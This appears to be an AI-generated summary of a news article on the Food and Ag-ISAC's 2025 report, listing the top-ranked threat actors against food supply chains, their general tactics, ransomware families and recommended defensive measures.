Full Report
The Food and Ag-ISAC paints a stark picture of a sector facing sustained and increasingly sophisticated cyber pressure,... The post Food and Ag-ISAC finds 72 active threat actors behind persistent, sophisticated cyber attacks targeting food supply chains appeared first on Industrial Cyber.
Analysis Summary
Based on the article provided, here is the structured summary of the threat landscape affecting the Food and Agriculture sector.
*Note: As the article identifies a cluster of 72 actors rather than focusing on a single entity, the summary below highlights the top-ranked adversaries identified by the Food and Ag-ISAC.*
# Threat Actor: Food & Ag Sector Top Adversaries (Group Summary)
## Attribution & Identity
The Food and Ag-ISAC identified 72 active threat actors out of 330 monitored adversaries. The primary threat is attributed to:
* **Russia:** 59.3% of observed activity (Nation-state and Ransomware ecosystems).
* **China:** 25.4% of observed activity (Nation-state operations).
* **Top 10 Ranked Actors (by PASS score):**
1. **Lazarus Group** (North Korea, Nation-state) - Score: 84
2. **Moonstone Sleet** (North Korea, Nation-state) - Score: 84
3. **APT41** (China, Nation-state) - Score: 79
4. **Scattered Spider** (Financial/Cybercriminal) - Score: 77
5. **Qilin** (Ransomware) - Score: 76
6. **LockBit 5.0** (Ransomware) - Score: 76
7. **Lapsus$ Hunters** (Cybercriminal) - Score: 76
8. **Dark Engine** (Hacktivist) - Score: 76
9. **APT18** (China, Nation-state) - Score: 75
10. **Akira** (Ransomware) - Score: 73
## Activity Summary
The sector is facing sustained pressure described in "The 2025 Food and Agriculture Cyber Threat Report." Recent activity includes persistent targeting of the "farm-to-table" supply chain throughout late 2024 and early 2025. Operations are characterized by a dual threat of state-backed espionage and financially motivated ransomware.
## Tactics, Techniques & Procedures
* **Living-off-the-Land (LotL):** Using legitimate system tools to blend in with normal traffic.
* **Modified Malware:** Deployment of customized malicious code to evade detection.
* **Supply Chain Compromise:** Exploiting third-party vendors to gain access to primary targets.
* **Data Extortion:** Stealing sensitive data to pressure victims into paying ransoms.
* **Persistent Access:** High focus on maintaining long-term presence within industrial networks.
## Targeting
* **Sectors:** Food and Agriculture supply chain (production, processing, and distribution).
* **Geography:** Global, with significant focus on Russian and Chinese geopolitical interests; the report also references the Nordics and US infrastructure.
* **Victims:** General "farm-to-table" entities; specific mention of the medical tech giant Stryker (suspected Iran-linked) and New York water infrastructure in related news.
## Tools & Infrastructure
* **Malware Families:**
* LockBit 5.0
* Qilin
* Akira
* **Infrastructure:**
* Vulnerable VMWare Horizon servers (previously exploited by Lazarus).
* Remote access tools used for persistence.
* Infrastructure associated with ransomware ecosystems.
## Implications
The strategic intent behind these attacks is a mix of financial gain and geopolitical leverage. The high representation of Russia and China suggests that food security is being used as a tool for state-level pressure. The vulnerability of the supply chain means that a single successful attack can have cascading effects on food availability and economic stability.
## Mitigations
* **Prioritize Resource Allocation:** Use the Predictive Adversary Scoring System (PASS) to focus on the highest-scoring threats (e.g., Lazarus, Moonstone Sleet).
* **Supply Chain Security:** Enhance vetting and monitoring of third-party vendors and remote access points.
* **Living-off-the-Land Defense:** Implement behavioral monitoring to detect the misuse of legitimate administrative tools.
* **Information Sharing:** Engage with the Food and Ag-ISAC to access actionable threat intelligence and PASS metrics.